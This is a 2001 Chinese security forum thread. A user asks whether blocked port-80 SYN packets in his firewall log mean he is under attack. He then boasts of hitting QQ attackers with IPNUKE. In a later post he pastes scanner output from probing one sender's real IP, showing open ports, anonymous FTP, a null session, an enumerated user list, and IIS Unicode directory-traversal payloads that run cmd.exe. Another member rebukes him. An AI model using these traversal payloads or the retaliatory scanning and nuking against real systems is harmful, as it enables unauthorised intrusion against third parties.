主题:  是有人在攻击我吗?

困龙在天
职务:普通成员
等级:7
金币:10.0
发贴:2942
注册:2001/5/17 23:14:57
#12001/8/6 17:06:03
我的天网提示以下信息,是有人在攻击我吗?
装了天网后,经常能收到这样的信息!


[01-8-6 16:43:05] 接收到 61.133.73.68 的 TCP 数据包

本机端口: 80 ,对方端口: 3393 ,TCP标志: S

该包被拦截

[01-8-6 16:43:09] 接收到 61.133.73.68 的 TCP 数据包

本机端口: 80 ,对方端口: 3393 ,TCP标志: S

该包被拦截

[01-8-6 16:43:14] 接收到 61.133.73.68 的 TCP 数据包

本机端口: 80 ,对方端口: 3393 ,TCP标志: S

该包被拦截

[01-8-6 16:46:21] 接收到 61.133.118.79 的 TCP 数据包

本机端口: 80 ,对方端口: 2156 ,TCP标志: S

该包被拦截

[01-8-6 16:46:23] 接收到 61.133.118.79 的 TCP 数据包

本机端口: 80 ,对方端口: 2156 ,TCP标志: S

该包被拦截

[01-8-6 16:46:29] 接收到 61.133.118.79 的 TCP 数据包

本机端口: 80 ,对方端口: 2156 ,TCP标志: S

该包被拦截

[01-8-6 16:48:40] 接收到 61.133.193.200 的 TCP 数据包

本机端口: 80 ,对方端口: 2044 ,TCP标志: S

该包被拦截

[01-8-6 16:48:42] 接收到 61.133.193.200 的 TCP 数据包

本机端口: 80 ,对方端口: 2044 ,TCP标志: S

该包被拦截

[01-8-6 16:48:48] 接收到 61.133.193.200 的 TCP 数据包

本机端口: 80 ,对方端口: 2044 ,TCP标志: S

该包被拦截

[01-8-6 16:52:16] 接收到 61.133.92.110 的 TCP 数据包

本机端口: 80 ,对方端口: 4068 ,TCP标志: S

该包被拦截

[01-8-6 16:52:20] 接收到 61.133.92.110 的 TCP 数据包

本机端口: 80 ,对方端口: 4068 ,TCP标志: S

该包被拦截

[01-8-6 16:52:25] 接收到 61.133.92.110 的 TCP 数据包

本机端口: 80 ,对方端口: 4068 ,TCP标志: S

该包被拦截

[01-8-6 16:52:39] 接收到 61.133.125.70 的 TCP 数据包

本机端口: 80 ,对方端口: 2463 ,TCP标志: S

该包被拦截

[01-8-6 16:52:42] 接收到 61.133.125.70 的 TCP 数据包

本机端口: 80 ,对方端口: 2463 ,TCP标志: S

该包被拦截

[01-8-6 16:52:48] 接收到 61.133.125.70 的 TCP 数据包

本机端口: 80 ,对方端口: 2463 ,TCP标志: S

该包被拦截

[01-8-6 17:02:13] 接收到 61.153.109.136 的 TCP 数据包

本机端口: 80 ,对方端口: 4038 ,TCP标志: S

该包被拦截

[01-8-6 17:02:15] 接收到 61.153.109.136 的 TCP 数据包

本机端口: 80 ,对方端口: 4038 ,TCP标志: S

该包被拦截

[01-8-6 17:02:18] 接收到 61.153.109.136 的 TCP 数据包

本机端口: 80 ,对方端口: 4038 ,TCP标志: S

该包被拦截


[url]http://sintian.chinaccd.net[/url]

我就是我
职务:版主
等级:6
金币:14.0
发贴:5466
注册:2004/1/13 17:02:03
#22001/8/6 17:41:37
这种信息我一天可以收到上千个,从一开机就可以收到,一直到关机



困龙在天
职务:普通成员
等级:7
金币:10.0
发贴:2942
注册:2001/5/17 23:14:57
#32001/8/6 19:16:49
但是这是什么14呢?


[url]http://sintian.chinaccd.net[/url]

我就是我
职务:版主
等级:6
金币:14.0
发贴:5466
注册:2004/1/13 17:02:03
#42001/8/7 1:07:47
有许多的数据包是你自己的,有一些是因为你开oicq接受到信息天网误认为是攻击,有一些是有人在用追捕查你的ip,有写是有人再ping你的ip,多种多样的



ewind
职务:普通成员
等级:5
金币:10.0
发贴:3074
注册:2001/3/4 18:39:07
#52001/8/7 6:47:31
飞说得有道理,有些并不是被别人攻击你,而是你自己本身再接受数剧包,天网误认为在攻击你~


网侠

困龙在天
职务:普通成员
等级:7
金币:10.0
发贴:2942
注册:2001/5/17 23:14:57
#62001/8/7 7:43:54
呵呵!我很少开QQ的!
有几次竟有人用QQ炸我!
我大部分都回敬了他们,用IPNUKE!
礼尚往来吗!


[url]http://sintian.chinaccd.net[/url]

hiinhie
职务:普通成员
等级:1
金币:0.0
发贴:102
注册:2001/7/20 11:01:15
#72001/8/7 13:10:01
不过,一天接这种多正常吗?
几乎来自同一个主机名。



5D荣誉版主
职务:普通成员
等级:3
金币:3.0
发贴:807
注册:2000/10/19 22:49:54
#82001/8/8 7:15:12
呵呵
没那么可怕吧



困龙在天
职务:普通成员
等级:7
金币:10.0
发贴:2942
注册:2001/5/17 23:14:57
#92001/8/8 9:02:17
不是一天呀!
是一直收到这么多的数据包!
IP地址也不一样呀!


[url]http://sintian.chinaccd.net[/url]

困龙在天
职务:普通成员
等级:7
金币:10.0
发贴:2942
注册:2001/5/17 23:14:57
#102001/8/12 0:53:20
呵呵,这个服务器有不少漏洞啊。有可能被人黑过了,上载了扫描器。

漏洞:有UNICODE还有IDA和IDQ(红色代码就是依靠这个漏洞的)
PLUGIN-> 扫描 61.133.73.68 IIS5.0 NULL.Printer Exploit ...成功
SMTP-> 主机 61.133.73.68 VRFY ...支持
IPC-> 主机 61.133.73.68 建立空连接 ...成功
CGI-> 检测 61.133.73.68 /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:\ ...成功
PORT-> 主机 61.133.73.68 端口 0080 ...开放
PORT-> 主机 61.133.73.68 端口 0021 ...开放
PORT-> 主机 61.133.73.68 端口 0025 ...开放
PORT-> 主机 61.133.73.68 端口 0053 ...开放
PORT-> 主机 61.133.73.68 端口 0443 ...开放
FTP-> 主机 61.133.73.68 FTP 版本信息 ... china Microsoft FTP Service (Version 5.0).

FTP-> 主机 61.133.73.68 FTP 匿名登录 ...允许
PORT-> 主机 61.133.73.68 端口 0139 ...开放
PORT-> 主机 61.133.73.68 端口 0515 ...开放
IIS-> 主机 61.133.73.68 IIS检测 FrontPage 扩展 ...成功
PORT-> 主机 61.133.73.68 端口 1433 ...开放
CGI-> 检测 61.133.73.68 /scripts/samples/search/simple.idq ...成功
CGI-> 检测 61.133.73.68 /scripts/samples/search/queryhit.idq ...成功
CGI-> 检测 61.133.73.68 /scripts/samples/search/query.idq ...成功
CGI-> 检测 61.133.73.68 /scripts/samples/search/filetime.idq ...成功
CGI-> 检测 61.133.73.68 /scripts/samples/search/filesize.idq ...成功
CGI-> 检测 61.133.73.68 /scripts/samples/search/author.idq ...成功
CGI-> 检测 61.133.73.68 /_vti_bin/shtml.dll/_vti_rpc ...成功
CGI-> 检测 61.133.73.68 /scripts/samples/search/qfullhit.htw ...成功
CGI-> 检测 61.133.73.68 /scripts/samples/search/qsumrhit.htw ...成功
CGI-> 检测 61.133.73.68 /iissamples/issamples/query.idq ...成功
CGI-> 检测 61.133.73.68 /iissamples/issamples/oop/qsumrhit.htw ...成功
CGI-> 检测 61.133.73.68 /iissamples/issamples/oop/qfullhit.htw ...成功
CGI-> 检测 61.133.73.68 /iissamples/issamples/fastq.idq ...成功
CGI-> 检测 61.133.73.68 /iissamples/exair/search/search.idq ...成功
CGI-> 检测 61.133.73.68 /iissamples/exair/search/qsumrhit.htw ...成功
CGI-> 检测 61.133.73.68 /iishelp/iis/misc/iirturnh.htw ...成功
CGI-> 检测 61.133.73.68 /iissamples/exair/search/query.idq ...成功
CGI-> 检测 61.133.73.68 /iissamples/exair/search/qfullhit.htw ...成功
CGI-> 检测 61.133.73.68 /blabla.idq ...成功
CGI-> 检测 61.133.73.68 /abczxv.htw ...成功
CGI-> 检测 61.133.73.68 /_vti_inf.html ...成功
CGI-> 检测 61.133.73.68 /_vti_bin/shtml.dll/_vti_rpc ...成功
CGI-> 检测 61.133.73.68 /_vti_bin/shtml.exe ...成功
CGI-> 检测 61.133.73.68 /_vti_bin/fpcount.exe ...成功
CGI-> 检测 61.133.73.68 /_vti_bin/shtml.dll ...成功
CGI-> 检测 61.133.73.68 /_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\ ...成功
CGI-> 检测 61.133.73.68 /_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\ ...成功
CGI-> 检测 61.133.73.68 /?PageServices ...成功
CGI-> 检测 61.133.73.68 /*.idq ...成功
CGI-> 检测 61.133.73.68 /*.ida ...成功
IPC-> 读取主机 61.133.73.68 的用户列表 ...完成(10个用户)


[url]http://sintian.chinaccd.net[/url]

pccat
职务:普通成员
等级:1
金币:0.0
发贴:34
注册:2001/7/20 19:41:13
#112001/8/12 0:57:35
老弟,做点正事吧,这种陈年漏洞你还去管他,这样的服务器的管理员太滥了!
到我这里看看


以后注意场合。

编辑历史:[这消息被木木树编辑过(编辑时间2001-08-12 01:15:03)]

再坚持就会胜利
职务:普通成员
等级:3
金币:10.0
发贴:1241
注册:2001/1/11 11:05:12
#122001/8/12 1:32:47
其实最多的时候还是QQ了,所以一般可以不必理会,我的也是这样。